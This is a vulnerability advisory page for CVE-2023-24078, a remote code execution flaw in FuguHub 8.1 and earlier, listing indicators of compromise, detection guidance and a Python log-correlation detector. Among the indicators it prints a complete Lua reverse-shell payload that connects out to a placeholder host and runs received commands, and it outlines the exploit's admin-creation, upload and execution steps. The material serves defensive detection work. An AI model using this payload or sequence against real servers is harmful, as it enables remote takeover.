CVE-2023-24078
published 2023-02-17

CVE-2023-24078: Real Time Logic FuguHub v8.1 and earlier was discovered to contain a remote code execution (RCE) vulnerability via the component /FuguHub/cmsdocs/.

Priority: P274 · high · 8.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 53.24% (98.8th percentile)

Affected

1 range
Vendor         Product   Version range   Fixed in
realtimelogic  fuguhub   <= 8.1

Detection & IOCs (extracted from sources)

path: /FuguHub/cmsdocs/
url: /Config-Wizard/wizard/SetAdmin.lsp
url: /rtl/protected/wfslinks.lsp
url: /fs/cmsdocs/
filename: rev.lsp
url: /rev.lsp
command: local host, port = "{LHOST}", {LPORT} local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()
  • Monitor for unauthenticated or authenticated POST requests to /Config-Wizard/wizard/SetAdmin.lsp, which the exploit uses to create a rogue admin account if none exists.
  • Detect POST requests uploading files with Content-Type application/octet-stream to /fs/cmsdocs/, particularly files with a .lsp extension, which are server-side Lua script pages executed by FuguHub.
  • Alert on HTTP GET requests to /rev.lsp (or any newly uploaded .lsp file under /fs/cmsdocs/) immediately following a file upload, indicating webshell execution.
  • Look for Lua reverse-shell patterns in uploaded files: use of socket.tcp(), io.popen(), and tcp:receive()/tcp:send() loops, which are characteristic of the exploit payload.
  • Monitor for POST requests to /rtl/protected/wfslinks.lsp with form fields ba_username and ba_password, used by the exploit to authenticate before staging the upload.
  • The exploit checks whether an admin account already exists via /Config-Wizard/wizard/SetAdmin.lsp; if the page returns 'User database already saved', it skips account creation and proceeds directly to login. Hardened deployments with existing admin accounts are still vulnerable to the upload stage.
  • The file server path used for upload defaults to /fs/cmsdocs/ but the exploit notes it searches for a valid file server link, implying the path prefix (e.g., 'fs') may vary per deployment.
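
The request sequence in the bullets above can be correlated per client from web access logs. The script below is an added example, not taken from this page's sources or from FuguHub: it assumes Common Log Format input, and the sample lines, client addresses, function name and five-minute window are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in Common Log Format (an assumption; adapt LINE to your log source).
SAMPLE = """\
198.51.100.7 - - [17/Feb/2023:10:00:01 +0000] "POST /Config-Wizard/wizard/SetAdmin.lsp HTTP/1.1" 200 512
198.51.100.7 - - [17/Feb/2023:10:00:02 +0000] "POST /rtl/protected/wfslinks.lsp HTTP/1.1" 200 734
198.51.100.7 - - [17/Feb/2023:10:00:03 +0000] "POST /fs/cmsdocs/ HTTP/1.1" 200 88
198.51.100.7 - - [17/Feb/2023:10:00:04 +0000] "GET /rev.lsp HTTP/1.1" 200 0
203.0.113.9 - - [17/Feb/2023:10:05:00 +0000] "POST /rtl/protected/wfslinks.lsp HTTP/1.1" 200 734
203.0.113.9 - - [17/Feb/2023:10:05:09 +0000] "GET /index.lsp HTTP/1.1" 200 4096
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
UPLOAD = re.compile(r"^/[^/]+/cmsdocs/")  # the prefix ("fs") may vary per deployment
STAGES = {"/Config-Wizard/wizard/SetAdmin.lsp": "setadmin",
          "/rtl/protected/wfslinks.lsp": "login"}

def detect(log_text, window=timedelta(minutes=5)):
    """Alert when a client GETs a previously unseen .lsp page soon after a cmsdocs upload."""
    seen_lsp, state, alerts = set(), {}, []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, ts, method, target, _status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        path = target.split("?", 1)[0]
        st = state.setdefault(ip, {"stages": [], "upload": None})
        if method == "POST" and path in STAGES:
            st["stages"].append(STAGES[path])      # account setup / login staging
        elif method == "POST" and UPLOAD.match(path):
            st["upload"] = when                    # file pushed to the file server
        elif method == "GET" and path.lower().endswith(".lsp"):
            fresh = path not in seen_lsp           # first request for this script
            if fresh and st["upload"] and when - st["upload"] <= window:
                alerts.append({"client": ip, "script": path,
                               "stages": st["stages"] + ["upload"]})
                st["upload"] = None
        if path.lower().endswith(".lsp"):
            seen_lsp.add(path)
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

On real logs, seed the set of known .lsp pages from a baseline period first, otherwise the first legitimate page view after an upload is reported as new.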